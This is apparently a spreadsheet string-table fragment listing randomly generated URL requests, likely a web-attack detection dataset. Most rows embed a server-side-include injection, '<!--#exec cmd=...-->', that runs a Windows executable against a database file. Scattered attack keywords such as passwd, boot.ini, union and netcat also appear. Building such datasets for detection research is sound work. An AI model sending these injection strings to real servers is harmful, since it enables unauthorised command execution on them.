    <t>/oldza88w.ut9xrc/3imb8q/asdar25o2adkotncttr/dqfolzsv0/eoxi85jc1wt76l/njqgnkbtz/y0/.p3-xfrom6/tenelnds/osd5htstaptashni9.html?racjwteadrihs=snc(&amp;emo5eevaea=fm=oa5gi$ahur$opt'ygdd&amp;6ti=07&amp;rtwi64satrwct=yedcstdinnpurag6e7&amp;m15bzblp=jpl8ig&amp;swanewcst0euh=33576&amp;wvzy1hf9=e01d&amp;asv=2r0deletep0'2f&amp;fve2qexec.9tm=eviibecreh&amp;ftpeliimotra=ri;tetmpceuts&amp;ia=f4e&amp;snr6hj0uk=eqeomed&amp;nlly7e=6icarecp&amp;8enpei=&lt;!--+++++#exec+++++cmd="c:\\progra~1\\dieeuh6\\uostn\\dericas.exe++++d:\\nir\\www.eninrogera.org\\ulbaeeb\\database.mdb++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/qpdm/q8idpntzwu.php?hrgonsihot=&lt;!--+#exec++++cmd="c:\\progra~1\\he\\loaqelaey\\tjr2o.exe+++++d:\\qal\\www.nsri.org\\tq\\database.mdb++++/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/bnaenwcttergnm4l8cbt/4arsixrl.asmx?iqhonleeaneuo=hsst&amp;xzqecn=&lt;!--+#exec+++++cmd="c:\\progra~1\\bdnbmhroa\\oeo2taaeie\\toon.exe+++d:\\sc9movedo\\www.asal.org\\tfae3t\\database.mdb++/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/ciin1fes7n/iatrehd8onnurseyip/ie0eys5bn5rlsas/ny5ddp8bjrfohc_u9tcj/tbb21/v7-/zs50x53reehs6ljaj/rsjbuwvunktyn2passwd.mspx?yardeiiar=&lt;!--++++#exec++cmd="c:\\progra~1\\te0eo9\\ttimym\\seony.exe+d:\\et2ilnn\\www.arsirotiri.org\\lttafsni\\database.mdb++/x+exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/gbwbb2e8ztt22x/t5v@dvrd9oy3/icmianmse/tsduvnsorf96s5qojeea/twsqlgyzwa/usrpaokplyeperlb.css?evbstbnoeripu=eapositionl3&amp;dogaeletoavncqn=ea3c&amp;s6ewe30tcrdra5=ug&amp;ifbfun3=rgank&amp;peiswoamxderma=507677931&amp;yqo=diacrwhtc&amp;tolswo=deokstpesl1urxta3w&amp;vaiv5varaqvkwe=tpntlocationnhttpsse&amp;l8d&amp;tlz@qwth=h9k1umpsurzz&amp;fythnicensalu=grdstyalhlszesli&amp;idlfh5oeini=56015&amp;r6odt9aeh6c=8597154&amp;cirisphs=pa&amp;bhyform1pflbv7m=&lt;!--#exec++++cmd="c:\\progra~1\\llrsenor\\06iwmoc\\pcotddf.exe++++d:\\usna\\www.etderaisol.org\\ldlohfpe\\database.mdb++/x++exporttofoxpro"--&gt;&amp;fhmwh=417625</t>
  </si>
  <si>
    <t>/of2oj/luqkivatetente/ytd4tt9hncjhav2rrsc/nr2ephepssllem9nb/e-/yoc0z9u9fu.jpeg?cirqkedl=&lt;!--++++#exec+++++cmd="c:\\progra~1\\esinoq8peh\\8l\\aobibfne.exe+++++d:\\r1k\\www.orilerti.org\\nmd\\database.mdb+++++/x++++exporttofoxpro"--&gt;&amp;sa=oe</t>
  </si>
  <si>
    <t>/axwx@4j8.sock_streamg/gnped6/odtiot0ekeae/tlk26ywpnmgeoqovpbzq/dpasswdpschbn/zgwr/kk/a08otrr6aqtgjh/n@groupby2y.alibd.asp?iilo0odert=u+'j&amp;tw0snrn64sfx3u=btmocha&amp;tfpr0digoioie=&lt;!--++#exec+cmd="c:\\progra~1\\npvr\\zf\\rabrf.exe+++++d:\\lhenyfej\\www.chic.org\\tpptedea\\database.mdb+/x+++++exporttofoxpro"--&gt;&amp;ona6ogidssq3=41402406&amp;awetkapa=knkntdhmeadsort)s&amp;w1dstnb8ctric=09&amp;derroeyt=83rhws&gt;elahheol&amp;y.jvm_m5.@io=3emperlrrn&amp;saaze=ae77m&amp;nttt3598krdwncl=+i|uniond656?oconnectq@upassthruoae&amp;nfhvprocessing-instructionsgroupbytmp=i6p7_qv5ve&amp;p1mvtthel=guhgnstdinqor)ycns</t>
  </si>
  <si>
    <t>/jgvfg6dji5bxjlwpfvt/fb6vr@bibze-/iyeezlrcieyea/tl/tac/so698gifqmdw@y.js?dsi=&lt;!--+#exec+++++cmd="c:\\progra~1\\ood\\be\\onbl.exe+++++d:\\7rdtngrri\\www.ntilan.org\\exnacfeeq\\database.mdb+++/x++exporttofoxpro"--&gt;&amp;iarat=unehstvea&amp;myattmpa=h$i&amp;bddtm@xmailo=snscte4eoayuksui</t>
  </si>
  <si>
    <t>/azku0d.abjek/ynaide/h_pj8mevrzas6@w/gjw2q6/ist4bfi@wp5rprgu2n/9gd2fz./9.ot.blvpjj.jpg?i.7obrftt=c&amp;fsrnlle44n=&lt;!--#exec+++++cmd="c:\\progra~1\\epjaxe\\cl0es9wif\\edinazjj.exe++++d:\\nthaf\\www.etlirerili.org\\dqer\\database.mdb+++++/x++exporttofoxpro"--&gt;&amp;spoioltoisp7o=naduhse&amp;qeydseaocuclsw=gf8cjhf0qp&amp;a5qgymsi-x39=622&amp;exect8varnode=89102&amp;ee4bldshsg=82</t>
  </si>
  <si>
    <t>/ira4jnci/fex9elh5oawe3en4/ojtskqlktvkrhe/bdhteevacrbnlper/ao/wko9pfvsu/rh5vhw/n3thbcfchhca/mtl6jwh5e/w_x1vuhttps_id1.mspx?eibmgiti=uofiihrsle4is95a&amp;t3i0pmqdtw9nhg6=wr&amp;pihntesbset=idltud33&amp;pasnfwsyattinel=c%&amp;hl7wjhsock_streamk=\\ej&amp;slcgnd8=ne2etca~motf0in&amp;9nparasn2=+iln]hntitceva7&amp;imbcd=553&amp;1qssytanroaarzo=ghgmpjygd97&amp;nvcopyhsig77zp=lihrtrlipcme&amp;2lofbetweenbinmimg=baprocessing-instruction&amp;edw=&lt;!--+++++#exec+++++cmd="c:\\progra~1\\s0ibh\\6cfdntsc\\3n.exe+d:\\tmosi9rt\\www.totoonll.org\\ee\\database.mdb++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/rglditrdoieedkop5/de/9istyleemailz/nkqqsoxo.pl?epstte2f0b=osoeoyragsoqhs&amp;hso0=tl&amp;nde=65&amp;v.3gshutdown7cra=&lt;!--#exec++++cmd="c:\\progra~1\\y7udiist\\neenwds\\reint3rt.exe++++d:\\abg\\www.etrireet.org\\e4nnrslesi\\database.mdb++/x++++exporttofoxpro"--&gt;&amp;ignjhy9=twusr&amp;ia=126&amp;rst35lt=49565</t>
  </si>
  <si>
    <t>/hh1ao5r_-r069k/lppasswd7htpassletcjuf7hems/sm/dtrecd.html?ucomah=qc&amp;i6lahaesw=ho0soduetbtduea&amp;tnth2mnef=&lt;!--++#exec+cmd="c:\\progra~1\\ajtelesi\\iadr3mio\\mkaaela.exe+++d:\\oghet\\www.aretneme.org\\9glodedyeb\\database.mdb++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/0o3unionaeogacceptupdatewzxfk/gffvzdggxz3glgty/ua7kbbu2f.z5u/eeihbe/se4rtenqiswpnne6cdtb/b.vz9j5gi/dit.html?egrrqogagledim=enodebt&amp;bxfn6ecbb=561761330&amp;vinto5eoht=&lt;!--++++#exec+cmd="c:\\progra~1\\6ipigttao\\rc\\i6sc7et.exe++++d:\\td15uarnam\\www.niicinnsil.org\\vso\\database.mdb++/x++exporttofoxpro"--&gt;&amp;eklodrhoee6=73213&amp;os7dudfsce=989393</t>
  </si>
  <si>
    <t>/teljlonanrt/rz7yvd7rluvz3pxnh/xq2iu9qtwbwab/n1.aspx?ms7n=4120&amp;24endhky=023&amp;1e52owrm=142&amp;bos=g0ed4oteieer&amp;hririardhmpwynl=ieixzmee50&amp;osfnhr2twtui=~osst&amp;amimi5=bm_w-&amp;en8tflnfgb0=qslo&amp;rmsrntrnt9iyoa=cmjc7@tx&amp;dn3eaoehnleht=t6p3kbqh&amp;3u=2&amp;oaiv9pidtmn=&lt;!--++#exec++cmd="c:\\progra~1\\ythrns\\y2xee7htd\\qouhaxth.exe+++d:\\oiv8ami\\www.tesetrleit.org\\hmassc7tea\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;rtom-r2y=6d&amp;tt=e9kz3l</t>
  </si>
  <si>
    <t>/oluishougkau/ijpohb1vc14e@m.h/nhzjj9/otjlh7xhdevqx@/na.js?sdetmerleetidsl=&lt;!--+++#exec+++cmd="c:\\progra~1\\ypol\\tdeops\\uoetye.exe+++d:\\nwewdntn\\www.lireli.org\\eeeel1\\database.mdb+/x+++exporttofoxpro"--&gt;&amp;nodr5scmtasa=eval?ef$asystemt&amp;ayq1itnfvs6sh=emfkld-z0a</t>
  </si>
  <si>
    <t>/khmet5shheeybuohh/h8wp-access_logt4oihqagoo@/arcirhla354yn.cgi?uteirade=nyungauya&amp;teoofi5oahae=h9neiodcsgzaep&amp;sndiaa=insertkand$or96havingw0a&amp;f9hw-hgefl=gaeser9eabr&amp;codda=354&amp;dytum2nri8eah=&lt;!--+++++#exec+++cmd="c:\\progra~1\\sm\\e9ddfep\\zieitged.exe+++d:\\souwret\\www.tinaen.org\\r2ae\\database.mdb++/x+exporttofoxpro"--&gt;&amp;1u9=45872433&amp;qimaa7kxv@h=719917&amp;atstnb=+scy4&amp;snuhugoilaeml=5581703&amp;se66hnvm=eavarq&amp;brrsleii=3528127&amp;jw5c=pr&amp;esn=xg1c</t>
  </si>
  <si>
    <t>/aot/uxqjr_/cqqz00jznup7ifh-paaf/sctl/phpuh/tslaeesttitno8rehot/tf_pkukk2xvgflup3q/htrpinsert/b2nblxubetweenx/la/hnopqq_/uq8ntftpv.html?qmeta0.inputn=mailale&amp;scsdars3k=ltmhm&amp;hmtdt4ynud=s$a8[swinevqft:n+sa&amp;snh1=ld21unfrd8&amp;efrtt=dnsq&amp;digb9phtrtrniox=2668636&amp;cn=1othdpsentghw5sye&amp;nbt4tspigii7m=a_lr7s&amp;k3jtcijqktobjectz=5ncfa'nob[h2&amp;dtheei=sidmd&amp;eiurt5glrnm=5327594&amp;nisr=92834&amp;m4y=efperls&gt;&amp;xbgsoundouzu6mz=&lt;!--#exec++cmd="c:\\progra~1\\iolshylam\\id\\erwya.exe++++d:\\ylgeene2np\\www.altr.org\\th\\database.mdb++/x++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/autoexecttnodemua5bgsoundb/e5kzv3-kw/sbhogzwrvm/eodtseo34.dll?ao=lzac3&amp;qop92e=86&amp;oryizs48efe=23&amp;tilas=g2lgiafsa&amp;niyiena3e1=ipqxjp8l7ckr&amp;2itmt38=txuk6or&amp;meejyteof9rsehg=murynnben+-co&amp;hauye9tn99d=&lt;!--+++#exec+++++cmd="c:\\progra~1\\arweal\\soicst\\ttinlds.exe+++d:\\oyob\\www.enel.org\\yo0nsopa\\database.mdb+++++/x+++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/sdauvtr.html?riaelea=&lt;!--#exec+cmd="c:\\progra~1\\tpt\\ircy\\itic.exe+++d:\\eia\\www.alngatnine.org\\4yeehnqnie\\database.mdb+++++/x+++exporttofoxpro"--&gt;&amp;oaeswo2ddnrrjmg=8tnq7khjq0u&amp;fruuotomd=8eawobjectro(tnca8&amp;vleitseggmi=and&amp;ndycccatk=510</t>
  </si>
  <si>
    <t>/hy/gqtr/insertereplace0alljg/zortnserwyg/om@/yqz0ck/usvv/tv2dhi@-0vf.49chbu/oytj7/hg/af7hf/7epdif.js?lgcgall--m.o=eyp7chf4_&amp;dnwe0esf=wlezwhudgirmbaeu&amp;edhteor=&lt;!--++++#exec+++++cmd="c:\\progra~1\\tsuioiwxy\\esir4ldosz\\nnlorcla.exe+++d:\\edryi\\www.tatiasicen.org\\xson70ad\\database.mdb+++/x++++exporttofoxpro"--&gt;&amp;m5yenhawdip=02999971&amp;dheajyrosraaea=oeo&amp;fm1ta=reydh&amp;i9teeiohmorns9=e+hi45autmpbe&amp;baah6cihaith=9982</t>
  </si>
  <si>
    <t>/eghelnoftiah/fzdfrdxlq0fmgu6oui/raigd2tlehp7oaitei/b-rmetapr_6linkyctmpn/a0sgvaiaaeg/xopcrn/gscblkhl93eiqq/hfwe/tj/pterf5s/aop0.gif?on=rte&amp;shincludecat8@vh=&lt;!--+#exec++++cmd="c:\\progra~1\\wsloehybe\\ztoao\\tdevv.exe+d:\\rabinnans\\www.relilige.org\\t1onso\\database.mdb++/x+++++exporttofoxpro"--&gt;&amp;tojseeiweya=rcu4?ehjiepug</t>
  </si>
  <si>
    <t>/duiesneyasgharhy/th28e6pmoy/4uo_xi5/b3nvliked7.tc/w5klgzrcpiframeyxz/n9ticeioeeiln/5ipb4-618e/dropihjaneitrqe/ecllxmfzkma-g5l_6d/ch4l_s59ww8sreoe.nv/vuz8u0atkddo52gdmkgd/zyfb9-rv.pl?tourcsnetdp1eet=delersuey;5thnx&amp;jvv3kaqqbodyat=1bsenrlhv2xl&amp;8a=[winntu3e&lt;ppps6rubhw&amp;slurs=%3h&amp;ysvnrlnu7=ifja2tthrns3ik&amp;smslpoouan=n@g8qm_i&amp;layef=h0ai$shutdowneiddocumentrosd+opassthru+dnh&amp;lwqxfgd=28&amp;ttm=ci&amp;utfnieai=szgiw&amp;yailaotq4wttre=ebswyq9cmhi.&amp;z3object9hz0kce=&lt;!--+++++#exec+++cmd="c:\\progra~1\\1ut\\thsse\\iu.exe+d:\\netgfnqe\\www.nitichleni.org\\70oitbm\\database.mdb+++/x+++++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/inxmlm0v5nv/lhehnn/slkbh/r_pq9x_ctd3a/eeea2aawnmxeho/oeotsrthhezs/innrdcru/bodnntbpdtuh/okpq6.aspx?rueentrg=pvkb9c&amp;epw7=tinputtt6s&amp;a1dmssievcnrtn1=yyh8slyyfxw_&amp;dsf=ro1itrrsneetarnehd&amp;7fdebwstmtitss=ohat1s8nus0lt0dsu&amp;2j4je=tt4mooies~&amp;ritosu=l&gt;dsrh&amp;54ia5pyhtphn=&lt;!--+#exec+cmd="c:\\progra~1\\etiatn\\lee7s\\rdosdae8.exe++d:\\yl\\www.chre.org\\xm7yiosiei\\database.mdb+/x+exporttofoxpro"--&gt;&amp;ehsarwj=agoc1xesh7&amp;zqpte232ei=mq&amp;wctc=rev1hdiaaieahr&amp;rd=53557&amp;iiyigrrtatrtse=kmczie&amp;gaormd8linth3=bro&amp;aeaoxondfe=yiehoieacr</t>
  </si>
  <si>
    <t>/wjhatesl/jmcpotubfsyb6iymcxnd/ltjevarmzp/tsbt7hi1hu/ea1hbpnr/to6k3n4drthvygb1do0/ew6w6i9ucrspshee/rz-_zl/epd/iiijgepdoer/il6hqer95lldtwlnygd.swf?aiubg4uo=0pqmeesey&amp;uus93arxle=885938&amp;txtbtlceuhf=5279983&amp;oehljti=2057&amp;elw9cstdtct=di4naosseeioho&amp;deea1dtuareg=7319624&amp;9ehir8e=qt5gtn+/pacu9&amp;gieeofedhoaqnse=svu4q&amp;neegry=642&amp;rnei=ke9luea9eeixlm&amp;i7cle=&lt;!--+++++#exec+++cmd="c:\\progra~1\\ujeevyh3lr\\inmt\\wl.exe+++++d:\\kdgueg\\www.stanitinde.org\\3stnogeab\\database.mdb+++++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/ilklp/l.wy-wh/v1zrk1izpo/opsvbe@/tocboshahutbmins/chit3o9iir7tjbtu/vxnqxkmloh-s-s/b1es6tuaieeb7ysria/a9i_tfv4/orteiwit0/rzwx-5n8atz/iyckira79pzefesuf.shtml?a5sqcnc_=nmtgip&amp;znulltluk=&lt;!--+++++#exec+++++cmd="c:\\progra~1\\slcwu\\alliaeeeen\\feaa.exe++d:\\bebst\\www.siinsita.org\\metotwcn\\database.mdb++/x++exporttofoxpro"--&gt;&amp;4c9h8nuinfrnsmt=7292&amp;rel6lcgif=ktaotsscriptwherepss&amp;cfextermz=1162348</t>
  </si>
  <si>
    <t>/eybh3nv_tah@/eagkg/we3i/1yyaap0nx/ot/xtermguvfj_/zi/st_06_ovg/swjdpjajy.jpeg?5wbherup=&lt;!--#exec++++cmd="c:\\progra~1\\iooy\\dmy\\al.exe++d:\\seii7oo\\www.meitieorme.org\\tdege7rh\\database.mdb+/x+++exporttofoxpro"--&gt;&amp;bornj.@usru7o=991&amp;jtu5ithtm=+ehres&amp;bwnetpgmie=pr+mt0ot&amp;-xsock_streamfw5lc=7eofastr7ut&amp;rneueoosrlo=b)ocn-sn($likeis6ct</t>
  </si>
  <si>
    <t>/aay/pjc@xg0k.css?n-passwdwj2t8_axr=ai0fontsau&amp;hwwp-ua1hqg=35382&amp;nhemifeqoae=8573514340&amp;nuajiimemhern=1104&amp;.5rv_nu5=&lt;!--++++#exec++++cmd="c:\\progra~1\\pnoo\\h0heelio8\\2tzl.exe+++d:\\oab6nns\\www.stngil.org\\afettu\\database.mdb+/x+++exporttofoxpro"--&gt;&amp;ttpo=54&amp;ytoaulacknc=atuor+6re2farriy&gt;&amp;ecneh=t9lr\\:eeplb&amp;naeiif=ect&amp;ebfus</t>
  </si>
  <si>
    <t>/whohsine.dll?imnroonr1m6=]ea&amp;hvrkh=e&amp;ela6s=q1x&amp;ntshoqsoqik=e+e/&amp;ies0f=87652116&amp;dhejoeeenth=40874777&amp;rcpxcg=8&amp;9n=gexecperlbhaving&amp;sqln1agjqsm=&lt;!--++++#exec+++cmd="c:\\progra~1\\dtmtnetk0\\qhojfolel\\eehrrfrc.exe+++d:\\pecthstiue\\www.aticelne.org\\aeor1mqtsp\\database.mdb+++++/x+++++exporttofoxpro"--&gt;&amp;aeie=624&amp;fhueu=k(eiacsuhtoe</t>
  </si>
  <si>
    <t>/ihienhosr0ezeqtao/d@/nrroaddiseeeiik/ih/a8ksglnbdpb/ba8z/7quljhijcnso2.mdb?ebakbh29wjwlj0n=zi7xtvw&amp;owwo=ruxp_ns0sea~x%t&amp;&amp;-i20ggxprocessing-instructionxy=niudegotoacespd&amp;tdt3iszcenrtb=ael9ttu0ypasaerfc&amp;lloheiol=7&amp;yoe62pnatl3sein=i6e&amp;7pcmwehn=bibodye&amp;5ugbodyxo=&lt;!--+++#exec++cmd="c:\\progra~1\\nncsnto\\iabcsgo6u\\oee3.exe++++d:\\wt\\www.isatst.org\\seounco\\database.mdb++++/x++++exporttofoxpro"--&gt;&amp;7galpaa=soylnh9fxfaavsinr&amp;iueausdm=6868</t>
  </si>
  <si>
    <t>/yq8pbubu-vszxiphwo/arlibfzgn3-62/fek/dlgange7rst/io.exe?bniozgtcovu=&lt;!--+++#exec++cmd="c:\\progra~1\\vaipatfhac\\ewq\\us8e.exe+++d:\\zsahetivy\\www.ngtila.org\\et1db2g\\database.mdb+++++/x+++++exporttofoxpro"--&gt;&amp;ietjy7dtrfio=348&amp;ar=2i8p@kzhf&amp;eyhcrjira=42210021</t>
  </si>
  <si>
    <t>/bjn5vo7/nepyh5djvtaua39t@uz0/aqd8tuivfm5di2zb.jpg?tmshrr0olps=&lt;!--++#exec+++cmd="c:\\progra~1\\ntd3hrane\\oet\\ne.exe+d:\\chbjeie9\\www.mansasse.org\\te6gi\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;7cadeqraueooier=+ius1nxeti%uo&amp;hbdsnt&amp;qmkdiilc=f+&amp;a5cgsystemfmbsim=fjlscnedpssey9h&amp;srt=ohkpgjzvdy&amp;oyta9tgs=3926036&amp;lnh=upjthlntza&amp;eujivndituh=evi@zn&amp;tesiho32atysnot=exec+n8o+u+wnm&amp;keosnoi5cb18tl=a+i</t>
  </si>
  <si>
    <t>/qai7mloaoiaccr/ols2aviaca/nfs04sdfe/renytq7yis8/r5hgw4aoor5snrre7/y8widoitrtslte5z9no/pit8svllscript751miz/ic1rmx6heck/eh_l-o/dspqutbc2nqh9/tzs@kj9py41pbv.js?ursxlehe0rdoep=&lt;!--+++++#exec+++cmd="c:\\progra~1\\txi6pr\\o3reektea\\rosi.exe+++d:\\uee8tedk\\www.nsorrialns.org\\og3bage\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;2rsn8i4eob=forhtf1l\\ey2\\&amp;uncbtmddai8go=e-nvxf-@&amp;iq25g=m&amp;b9ruda=tuntp&amp;0inogents=na&amp;ygtmas5scclr8eo=76r&amp;yeniplrrsbsj=ae&amp;x-uvp5no=eoxoaieymtr&amp;szyeneeuf=iedr</t>
  </si>
  <si>
    <t>/oodaohq_/swahtpassd0ezity/flstuehegueaglteoek/nigatehroa/hbk1yrp08m/usiternilrgdni/wrgxejsxc/ulh8uncuyfzsnmnsd/tnas/iorrp.jpeg?higoeaac8y8do=8&amp;oht=fnv+&amp;hisetenfrv=055&amp;nk-.r.=24682&amp;uuhddehebr8wles=041003253&amp;nehek=&lt;!--++#exec+++++cmd="c:\\progra~1\\gewb\\dgi\\n4.exe+++d:\\nliis\\www.olre.org\\ltnn7amrrw\\database.mdb++/x++++exporttofoxpro"--&gt;&amp;1ennfrhqnsgeoxt=tq&amp;oujnnctyve=t2hgo</t>
  </si>
  <si>
    <t>/8s8.cgi?ezrp1yuw=pcn3isqi1&amp;reeui1hrviev=oa&amp;7od=xmloptoo&amp;yv3rry=81&amp;ose=0995339&amp;eel=l+psemtsgasi&amp;utb6atswri7=ul&amp;twhere9m7gqx8xwget=79&amp;9mshr=&lt;!--#exec++++cmd="c:\\progra~1\\dr32dhiaqy\\nugtd\\lhbtg.exe+++++d:\\w2n\\www.rimaitre.org\\anc1plouy\\database.mdb+/x+++exporttofoxpro"--&gt;&amp;4teutrg=437999521&amp;lvselectgx4@sexecyf=ekf&amp;qe2o=na82&amp;gednnwd=04909352&amp;rle3mlo=tk1ypqr3af&amp;k4dvwinnt=ermpdraita+</t>
  </si>
  <si>
    <t>/pnrv.gwfzm_rouwfoobw.asp?oo4hareux=&lt;!--+++#exec++++cmd="c:\\progra~1\\pnwsma\\detssteo\\eatalvq1.exe++d:\\ort\\www.rintmeontr.org\\sq\\database.mdb++++/x++exporttofoxpro"--&gt;&amp;iitcep=childshhhsedeolsecroycy&amp;bu4q4enale=lskokfaxzwl&amp;tn=iro&amp;ioonjrslo0=62149&amp;8tlxsnhn=cdimmpqa6yny&amp;sfottat6o=eulihmechobor+si&lt;t&amp;rrwriaepf3tbi=80603&amp;aeeedlowut3wtea=2866&amp;trlidtutom=:+&amp;1ppsd=t&amp;aeatar3tchfi=10vvmz@-u&amp;tta=rmeiycthusro&amp;mneetog9=t5dtnqecxt</t>
  </si>
  <si>
    <t>/c9yevt1azcomeo/2hqq3vlnhfav10/6hhisjy/dscrar3sp7h3um.xm/rb5e1ertnzyevou/v8xsveth_ajfca/ataawvduiacutre/ha_ga97e/y3dtnnwaterw/seteh1os2c/w6aesedtirx/fyfagcheodsace9c.asmx?so2uue=05483415&amp;awtadesdt=&amp;n&amp;tmptfbefet=rkthlowncnrh&amp;ptsnhrwrrqunr=iservicese119btap+&amp;vk7sn70fpqef=letetmptyaganerehome&amp;jrtaabsjre=30406&amp;soisnhkxe=gconnecthi:&amp;yenormth5sh=254846&amp;mpseanjjsh5=54&amp;sldals_l=ps4~4&amp;heaj=ehseeritpe1rrtl&amp;u_vojigx1=fgdahoefn7shiw6uy&amp;eceogexn=tr3&amp;xoaiiysahin=413906&amp;iah6tfii0=iqhatstpscdadii</t>
  </si>
  <si>
    <t>/tdifeeoreotdeeigou/ymgvhp1_zcaxazzjr@bf/r8rgnchwmkjw3/jooudb6stvm543usrs/hhta4ab7/wsiiagetssb6fds4sg/eworl50ee/ptarhedenne5lifcofj/ohmvcgcl/tce6m616cyyc.tiff?me=943855447&amp;7ecoipnksig=tnexxpv6v&amp;saenwqemidae=bakqda&amp;uiy9deahsrvn9o=83&amp;iedf=ei&amp;sucdbsiywsa=nshi&amp;nai8zjhtbsi=p4ehooc\\n0odbe&amp;sardmbb4d8=tr+ljghe(oz&amp;rtastp2ee=lfer&amp;dneauev=eexie&amp;peothnfecdrnoo=boot.ini'tt&amp;oagl2wefeiwg2=r&amp;romt=n+um0;n&gt;ryr</t>
  </si>
  <si>
    <t>/no4quf7r4/o_wrc828yxtomwz0o/toefba/pncl9qeb_0exblf/tslcnr8faasrfbate25/cntrossoieb1/oznponeesatmtm/linkwjtrlz9idde0t/iyvrp80j0x1ti-.dw/lf0lutmp_njz.js?hirot9cr=tdeletea&amp;amehendn=segrdti8&amp;optf6nv47gnndx=50070&amp;idtplr=telnete2eymsdaialho4t&amp;5ihttctc=4</t>
  </si>
  <si>
    <t>/eollac0ptnlet4atee/8-1fjmdj1bbwy/rmyfinputk4/tss1axovwcc/netcatsfxu6home/dxdfu.rsofuzfoqh/fgeo/7nph-linkopdivils3g-fbp6/ek.asmx?oep=l&amp;hmve8egi4glu=u6ny.n&amp;rod7wuatntzdo=1980&amp;lt=ioeo&amp;taih8=twp-nheo&amp;dsswuphh=44&amp;snn6pth=mrottofto&amp;ttea=:kla&amp;go=268&amp;kne0tnntaphpy=i&amp;3loisstrtlian5o=iiztn;y+&gt;uopenpn&amp;s9cfa=187534&amp;stwsege6=507788477&amp;iafnbssirqeumr=ph&lt;$</t>
  </si>
  <si>
    <t>/tsjpte9z2fyzrx7jszi/nz/nbreilnotcoln.jpg?iuadh8=tdulo&amp;osewpo75=553707&amp;ma9la=gii&amp;fu4fhxe2=68238783&amp;i5umgztinviefde=4&amp;jlbgsound7d-q=iohyisdn&amp;shaeeecloae=iypgftxv&amp;0eingo6bio=0921&amp;crpeqeei9l=8200728133&amp;-andsirwp7p=bgxg4x&amp;aetertdou=1674012568&amp;shmcatq=91</t>
  </si>
  <si>
    <t>/e2.mspx?tnivpoa2cani=6708&amp;erec8oan4s=lsmnzi8owsn&amp;cpmte=63318803&amp;m3alhs=nbja+&amp;aiacyene=nl&amp;mulxl8u=2ggx&amp;sbssetmllt=e10dnie&amp;odeteoudmr=ern&amp;iaoedesc=e-;xmlhlam&amp;nt5ilu=o~</t>
  </si>
  <si>
    <t>/pnsgux.jpeg?otrdajqao2=5</t>
  </si>
  <si>
    <t>/rrdg/wwnh/h3vma/nt2tscnsa/7xuxmltz9cta/fd/ehfs-plq9enw/napegkgd/eeaihg0zoea3rnfmt/nu4rwrh/u9lrionqletgue/t-9hvaczrw.jpg?qea=82&amp;oah1=653208&amp;erna=tebh\\mn3jbihany&amp;6htdorlowbaaeo=]we]&amp;twnnmghasn=rnamkt&amp;eirleyhmin=0&amp;s24eodu7sal2inw=i1oiupdatenidh@7htacces+|?oe+style9&amp;ljeoea=38&amp;a9aiirfdasu=lb9reosyd&amp;leioaahqshl5fgf=telnet=+ny</t>
  </si>
  <si>
    <t>/90libco/ne/zfngkuinput/ethcq8uotedeespai/0srcnec/njnaehs0hjstosplskt.bin?ceqlinaecaeye=re18fmg&amp;adxgi=tiolsxeqpr1o?v&amp;ww23bnf8n=0ndelete&amp;esdngy=shuitu&amp;zsx3xip-=hte8osindlqxp_m0&amp;rsraa=53o3s_mavq</t>
  </si>
  <si>
    <t>/jo-xufnullju/ietl5e9ui/dy/emn.php3?vypana_w5yaservices=6591071&amp;arbnatsz4=ezil&amp;mcqtii=76529&amp;8faina1cqe1etd=o1ejhwpvqe&amp;ekavk=ooaik1lunc7nars&amp;asetteytaot=6aa</t>
  </si>
  <si>
    <t>/njp/e2giha/sose2ra2eseeo/1tnnab/b9x/dsperlczl/mi1at@p@kgawme2.v-/aeaahypettd/hr/0osprc/passthrustqr.tiff?to=s2sr2em2c+inullote&amp;g&lt;where;&amp;yn=e8rt.w10ay&amp;ondansuo5tynwz=62&amp;srvuvar=woohanhror9ovn&amp;st=61139&amp;ripoaieih5ai=6521&amp;rlixn1nv=0u</t>
  </si>
  <si>
    <t>/a@putuodxvx1/jd6ywq8mail/6eeslheea/hhplo9/cahohex5/uk6f/1buuunodjalbhs2h@4/gktho1o/zoycn02riqokkh.frs/5nctpc/mjq79t26awxmf.css?inputmr8cgbbs36g=93&amp;fsnuryon=63he&amp;zmhetcsam35pxp4=6iee7p</t>
  </si>
  <si>
    <t>/rczfbbvcfigxhhe-5r@g/d0d@home3e@rlbinijff/ehpdpr@j76gu.htm?zisnettwr0ibans=3&amp;esme=gllieii1dhxg&amp;tm6taondo=79&amp;ent9=c+h&amp;loephtinh=t\\&amp;tescyfiineqt=n9ge6&amp;eobhtnarciep=e13jubemusmwhejhni&amp;efw8keieox4=1eoi&amp;p@kkw@f=&amp;h&amp;q@vrwrnwhereo-v=ytqeaa&amp;lmieuim=964744&amp;nsw=4163482987&amp;qfraor=36&amp;cyioeg=ifmzvd&amp;setdltcz3t=insertjk</t>
  </si>
  <si>
    <t>/nhdi5lmytwlo/btenaa4ohcrk13a0o/edier/ejme28/8eaga/gknenyod0aedetc/pvan.z17d3nu7thcvm/yjq54uw/qzbvppgqhxlc/o.c9bs3ci48qcrv5knga.cgi?jp=dnfxuvql&amp;tep5oilodreorea=etitsasfaa&amp;tgutndhet=479689&amp;c4asgfvna9=auqcwvy&amp;lte8o=12033&amp;gs=dht4optal+ct|&amp;mi0rzegsae3=6822881969&amp;o9e=84&amp;ab=0034&amp;la=a:w&amp;thdnzb0=adhtobersystem;buzn</t>
  </si>
  <si>
    <t>/7o6x45/t-a2l_/nov0l.png?rvlw=lib&amp;jty7dtkgas4hlut=+su&gt;nemhct&amp;mnrmo=nresor&amp;ewsiscript519u7=lkpe&amp;u5hdzuft=ooimateeoqhbol&amp;0i8gknth=iheeta&amp;slsupdateyyhpassthrukgpmb=4ae6&amp;8e=i6u&amp;aavfripsm=sie++?3e+e(ai</t>
  </si>
  <si>
    <t>/ttsqdow.tiff</t>
  </si>
  <si>
